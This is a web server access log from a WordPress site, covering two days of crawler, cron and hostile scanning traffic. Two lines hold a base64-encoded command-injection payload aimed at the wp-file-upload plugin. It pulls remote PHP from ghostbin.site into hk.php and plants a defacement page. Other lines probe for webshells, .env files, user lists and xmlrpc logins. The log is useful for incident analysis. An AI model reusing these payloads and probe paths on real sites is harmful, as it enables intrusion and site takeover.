45.55.37.107 - - [30/Mar/2025:21:09:34 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 15293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.55.37.107 - - [30/Mar/2025:21:09:34 -0400] "GET /?author=1 HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.55.37.107 - - [30/Mar/2025:21:09:35 -0400] "GET /?author=2 HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.55.37.107 - - [30/Mar/2025:21:09:35 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 2069 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
43.153.36.110 - - [30/Mar/2025:21:11:09 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.194 - - [30/Mar/2025:21:19:41 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
196.251.69.226 - - [30/Mar/2025:21:21:26 -0400] "POST /wp-content/plugins/wp-ver.php HTTP/1.1" 403 1242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.194 - - [30/Mar/2025:21:27:07 -0400] "GET /heres-the-reason-brilliant-entrepreneurs-currently-use-youtube-advancement/ HTTP/1.1" 200 23300 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:21:27:12 -0400] "POST /wp-cron.php?doing_wp_cron=1743384429.9519140720367431640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:21:27:22 -0400] "GET /soccer-grip-socks/ HTTP/1.1" 200 21473 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.194 - - [30/Mar/2025:21:27:35 -0400] "GET /muheloser-umzug-mit-dem-umzugsunternehmen-buchholz-in-der-nordheide/ HTTP/1.1" 200 23131 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.194 - - [30/Mar/2025:21:28:16 -0400] "GET /le-meilleur-article-vestimentaire-pour-une-saison-hivernale/feed/ HTTP/1.1" 404 15324 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:21:28:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743384496.8483660221099853515625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:21:28:45 -0400] "GET /2023/12/13/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:21:37:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743385067.4201650619506835937500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
93.123.109.101 - - [30/Mar/2025:21:37:42 -0400] "GET /lazada-decorate/lazada-mod-lib/0.0.20/LazadaModLib.min.js HTTP/1.1" 404 15319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
37.139.53.144 - - [30/Mar/2025:21:59:48 -0400] "GET /michael-kors-bags-a-vision-of-sophistication-and-glitz/ HTTP/1.1" 200 23120 "-" "Mozilla/5.0 (Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
54.36.149.62 - - [30/Mar/2025:22:00:31 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.194 - - [30/Mar/2025:22:06:18 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:22:07:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743386871.2503900527954101562500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
41.140.4.245 - - [30/Mar/2025:22:07:51 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://creative-webstyle.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
114.96.103.33 - - [30/Mar/2025:22:11:29 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.194 - - [30/Mar/2025:22:20:31 -0400] "GET /custom-portraits-for-your-beloved-dog/feed/ HTTP/1.1" 200 444 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:22:28:25 -0400] "POST /wp-cron.php?doing_wp_cron=1743388104.8705499172210693359375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:22:28:20 -0400] "GET /category/activity/page/80/ HTTP/1.1" 200 20648 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
170.106.167.214 - - [30/Mar/2025:22:29:09 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [30/Mar/2025:22:36:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743388619.7455999851226806640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
93.123.109.101 - - [30/Mar/2025:22:36:57 -0400] "GET /code/npm/@ali/lzd-h5-utils-jsonp/1.1.11/index.js HTTP/1.1" 404 15322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
195.191.219.132 - - [30/Mar/2025:22:41:39 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
195.191.219.132 - - [30/Mar/2025:22:41:40 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
216.244.66.194 - - [30/Mar/2025:22:53:53 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.153.202.101 - - [30/Mar/2025:23:00:52 -0400] "GET / HTTP/1.1" 200 98430 "http://creative-webstyle.com" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
216.244.66.194 - - [30/Mar/2025:23:09:37 -0400] "GET /2024/09/21/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:23:09:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743390579.3422880172729492187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
198.54.114.83 - - [30/Mar/2025:23:11:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743390699.3047399520874023437500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:23:11:37 -0400] "GET /revolutionizing-content-creation-the-power-of-ai-video-generators/feed/ HTTP/1.1" 200 465 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:23:26:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743391562.4226510524749755859375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
209.38.207.140 - - [30/Mar/2025:23:26:01 -0400] "GET /themes.php HTTP/1.1" 404 15283 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
209.38.207.140 - - [30/Mar/2025:23:26:03 -0400] "GET /admin.php HTTP/1.1" 404 15283 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2607:5300:60:7e27::1 - - [30/Mar/2025:23:30:05 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
196.251.88.242 - - [30/Mar/2025:23:36:46 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:23:36:58 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:23:37:14 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2406:da14:18ef:7f00:b4ac:6eaf:3bff:50ef - - [30/Mar/2025:23:37:15 -0400] "GET / HTTP/1.1" 200 98430 "-" "python-requests/2.32.3"
2406:da14:18ef:7f00:b4ac:6eaf:3bff:50ef - - [30/Mar/2025:23:40:44 -0400] "GET / HTTP/1.1" 200 98430 "-" "python-requests/2.32.3"
2406:da14:18ef:7f00:b4ac:6eaf:3bff:50ef - - [30/Mar/2025:23:46:18 -0400] "GET / HTTP/1.1" 200 98430 "-" "python-requests/2.32.3"
196.251.88.242 - - [31/Mar/2025:01:06:18 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [31/Mar/2025:01:06:30 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
89.234.157.254 - - [31/Mar/2025:01:21:36 -0400] "GET / HTTP/1.1" 200 0 "http://creative-webstyle.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.1.5000"
198.54.114.83 - - [31/Mar/2025:02:02:58 -0400] "POST /wp-cron.php?doing_wp_cron=1743400978.5400230884552001953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
196.251.69.226 - - [31/Mar/2025:02:02:55 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 404 15298 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [31/Mar/2025:02:32:14 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [31/Mar/2025:02:32:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743402737.3427259922027587890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
198.54.114.83 - - [31/Mar/2025:02:32:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743402737.3410270214080810546875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
198.54.114.83 - - [31/Mar/2025:02:32:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743402737.3401269912719726562500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
198.54.114.83 - - [31/Mar/2025:02:32:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743402737.3452270030975341796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
196.251.80.243 - - [31/Mar/2025:02:32:14 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 15257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [31/Mar/2025:02:32:14 -0400] "POST /wp-plain.php HTTP/1.1" 404 15236 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
93.123.109.101 - - [31/Mar/2025:02:32:17 -0400] "GET /lzdmod/site-nav-pc/5.2.38/assets/cart/index.js HTTP/1.1" 404 15315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
196.251.80.243 - - [31/Mar/2025:02:32:14 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 15297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.243 - - [31/Mar/2025:02:32:14 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 15299 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [31/Mar/2025:02:32:20 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 15244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.243 - - [31/Mar/2025:02:32:20 -0400] "GET /jpkcqbhe.php?Fox=d3wL7 HTTP/1.1" 404 15297 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
85.208.98.23 - - [31/Mar/2025:02:40:41 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
196.251.69.226 - - [31/Mar/2025:02:41:07 -0400] "GET /thoms.php HTTP/1.1" 404 15285 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
110.166.71.39 - - [31/Mar/2025:02:53:51 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
209.97.151.108 - - [31/Mar/2025:02:56:18 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
124.156.179.141 - - [31/Mar/2025:02:59:43 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [31/Mar/2025:03:37:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743406634.4222550392150878906250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
104.207.32.194 - - [31/Mar/2025:03:37:11 -0400] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
196.251.69.226 - - [31/Mar/2025:03:38:55 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 15295 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.69.226 - - [31/Mar/2025:03:39:08 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 15296 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.69.226 - - [31/Mar/2025:03:39:13 -0400] "GET /wp-content/plugins/pwnd-2/pwnd.php HTTP/1.1" 404 15297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.69.226 - - [31/Mar/2025:03:39:22 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 15297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.57.170.34 - - [31/Mar/2025:03:45:57 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.57.170.33 - - [31/Mar/2025:03:45:57 -0400] "GET /wp-content/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.153.19.83 - - [31/Mar/2025:03:52:41 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [31/Mar/2025:03:59:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743407956.7812259197235107421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
14.239.102.143 - - [31/Mar/2025:03:59:15 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"
138.204.35.141 - - [31/Mar/2025:03:59:19 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
216.244.66.194 - - [31/Mar/2025:04:09:49 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
45.84.107.182 - - [31/Mar/2025:04:13:00 -0400] "GET / HTTP/1.1" 200 98430 "http://creative-webstyle.com" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
216.244.66.194 - - [31/Mar/2025:04:18:39 -0400] "GET /ivf-clinics-in-sharjah/ HTTP/1.1" 200 22667 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.194 - - [31/Mar/2025:04:19:20 -0400] "GET /mid-face-lift/ HTTP/1.1" 200 22342 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:04:21:00 -0400] "POST /wp-cron.php?doing_wp_cron=1743409260.3638548851013183593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
37.236.237.21 - - [31/Mar/2025:04:20:59 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
79.114.163.87 - - [31/Mar/2025:04:21:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
198.54.114.83 - - [31/Mar/2025:04:27:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743409667.3785629272460937500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [31/Mar/2025:04:27:47 -0400] "GET /comment-supprimer-un-compte-1xbet/feed/ HTTP/1.1" 200 431 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:04:30:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743409828.8117110729217529296875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
93.123.109.101 - - [31/Mar/2025:04:30:27 -0400] "GET /code/npm/@ali/lzd-h5-utils-sites/1.1.11/index.js HTTP/1.1" 404 15319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
198.54.114.83 - - [31/Mar/2025:04:33:53 -0400] "POST /wp-cron.php?doing_wp_cron=1743410033.6386289596557617187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
152.42.177.187 - - [31/Mar/2025:04:33:49 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 404 15299 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:33:55 -0400] "GET /simple.php HTTP/1.1" 404 15285 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:33:56 -0400] "GET /cong.php HTTP/1.1" 404 15284 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:33:57 -0400] "GET /xxx.php HTTP/1.1" 404 15283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:33:59 -0400] "GET /tmpls.php HTTP/1.1" 404 15284 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:01 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 404 15301 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:02 -0400] "GET /chosen.php?p= HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:03 -0400] "GET /chosen.php HTTP/1.1" 404 15285 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:05 -0400] "GET /wp-cron.php?ac=3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:06 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 15300 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:08 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 15297 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:09 -0400] "GET /wp-includes/Text/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:09 -0400] "GET /wp-includes/Text/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:10 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 15297 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:11 -0400] "GET /Njima.php HTTP/1.1" 404 15286 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
